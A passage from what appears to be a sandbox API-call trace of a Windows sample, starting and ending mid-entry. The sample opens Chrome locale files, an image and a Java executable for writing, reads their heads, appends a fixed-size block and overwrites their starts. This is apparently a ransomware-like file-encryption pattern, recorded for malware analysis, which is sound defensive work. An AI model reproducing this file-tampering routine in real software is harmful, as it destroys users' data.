WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0112.473] ReleaseMutex (hMutex=0x168) returned 1 [0112.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ca.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0112.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ca.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac54, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ca.pak", lpUsedDefaultChar=0x0) returned 6 [0112.473] ReadFile (in: hFile=0x1d8, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0113.669] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x4f82b [0113.669] ReadFile (in: hFile=0x1d8, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0113.672] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x4f82b [0113.672] WriteFile (in: hFile=0x1d8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0113.672] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0113.672] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0113.673] CloseHandle (hObject=0x1d8) returned 1 [0113.673] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\es.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\es.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0113.675] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0113.675] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x512b8 [0113.675] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0113.675] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0113.676] ReleaseMutex (hMutex=0x168) returned 1 [0113.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="es.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0113.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="es.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac6c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="es.pak", lpUsedDefaultChar=0x0) returned 6 [0113.676] ReadFile (in: hFile=0x1d8, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0113.682] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x502b8 [0113.682] ReadFile (in: hFile=0x1d8, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0113.684] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x502b8 [0113.684] WriteFile (in: hFile=0x1d8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0113.685] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0113.685] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0113.685] CloseHandle (hObject=0x1d8) returned 1 [0113.685] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hi.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\hi.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0113.687] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0113.687] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xa3281 [0113.687] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0113.688] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0113.688] ReleaseMutex (hMutex=0x168) returned 1 [0113.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hi.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0113.688] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hi.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac6c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hi.pak", lpUsedDefaultChar=0x0) returned 6 [0113.688] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x345f278*=0xf000, lpOverlapped=0x0) returned 1 [0113.691] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0113.692] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xa2281 [0113.692] ReadFile (in: hFile=0x1d8, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0113.694] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xa2281 [0113.695] WriteFile (in: hFile=0x1d8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0113.695] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0113.695] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x345f28c*=0xf000, lpOverlapped=0x0) returned 1 [0113.695] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0113.695] CloseHandle (hObject=0x1d8) returned 1 [0113.696] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\lt.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\lt.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0113.697] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0113.697] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x51c11 [0113.697] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0113.697] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0113.698] ReleaseMutex (hMutex=0x168) returned 1 [0113.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lt.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0113.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lt.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac6c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lt.pak", lpUsedDefaultChar=0x0) returned 6 [0113.698] ReadFile (in: hFile=0x1d8, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0113.700] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x50c11 [0113.700] ReadFile (in: hFile=0x1d8, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0113.702] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x50c11 [0113.702] WriteFile (in: hFile=0x1d8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0113.703] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0113.703] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0113.703] CloseHandle (hObject=0x1d8) returned 1 [0113.703] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pt-BR.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\pt-br.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0113.705] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0113.705] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x4e63d [0113.705] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0113.705] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0113.705] ReleaseMutex (hMutex=0x168) returned 1 [0113.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pt-BR.pak", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0113.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pt-BR.pak", cchWideChar=9, lpMultiByteStr=0x1f7344c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pt-BR.pak", lpUsedDefaultChar=0x0) returned 9 [0113.706] ReadFile (in: hFile=0x1d8, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0113.708] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x4d63d [0113.708] ReadFile (in: hFile=0x1d8, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0113.710] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x4d63d [0113.710] WriteFile (in: hFile=0x1d8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0113.710] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0113.710] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0113.711] CloseHandle (hObject=0x1d8) returned 1 [0113.711] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sw.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\sw.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0114.458] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0114.458] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x44b74 [0114.459] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0114.459] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.459] ReleaseMutex (hMutex=0x168) returned 1 [0114.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sw.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0114.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sw.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac6c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sw.pak", lpUsedDefaultChar=0x0) returned 6 [0114.506] ReadFile (in: hFile=0x208, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0114.533] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x43b74 [0114.533] ReadFile (in: hFile=0x208, lpBuffer=0x1e96408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e96408*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.795] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x43b74 [0114.795] WriteFile (in: hFile=0x208, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.796] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0114.796] WriteFile (in: hFile=0x208, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0114.797] CloseHandle (hObject=0x208) returned 1 [0114.797] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\zh-TW.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\zh-tw.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0114.802] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0114.802] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x42194 [0114.802] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0114.802] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.802] ReleaseMutex (hMutex=0x168) returned 1 [0114.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zh-TW.pak", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zh-TW.pak", cchWideChar=9, lpMultiByteStr=0x1f7362c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="zh-TW.pak", lpUsedDefaultChar=0x0) returned 9 [0114.803] ReadFile (in: hFile=0x208, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0114.805] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x41194 [0114.806] ReadFile (in: hFile=0x208, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.813] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x41194 [0114.813] WriteFile (in: hFile=0x208, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.814] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0114.814] WriteFile (in: hFile=0x208, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0114.814] CloseHandle (hObject=0x208) returned 1 [0114.814] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\smalllogocanary.png" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\smalllogocanary.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0114.822] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0114.822] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1ea2 [0114.822] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0114.822] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.822] ReleaseMutex (hMutex=0x168) returned 1 [0114.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="smalllogocanary.png", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0114.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="smalllogocanary.png", cchWideChar=19, lpMultiByteStr=0x1f88d34, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smalllogocanary.png", lpUsedDefaultChar=0x0) returned 19 [0114.822] ReadFile (in: hFile=0x208, lpBuffer=0x2667868, nNumberOfBytesToRead=0x1ea2, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesRead=0x345f2bc*=0x1ea2, lpOverlapped=0x0) returned 1 [0114.880] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0114.880] WriteFile (in: hFile=0x208, lpBuffer=0x1ea7988*, nNumberOfBytesToWrite=0x242a, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea7988*, lpNumberOfBytesWritten=0x345f2d0*=0x242a, lpOverlapped=0x0) returned 1 [0114.881] CloseHandle (hObject=0x208) returned 1 [0114.882] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\jabswitch.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jabswitch.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0114.884] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0114.884] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xbba8 [0114.885] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0114.885] WaitForSingleObject 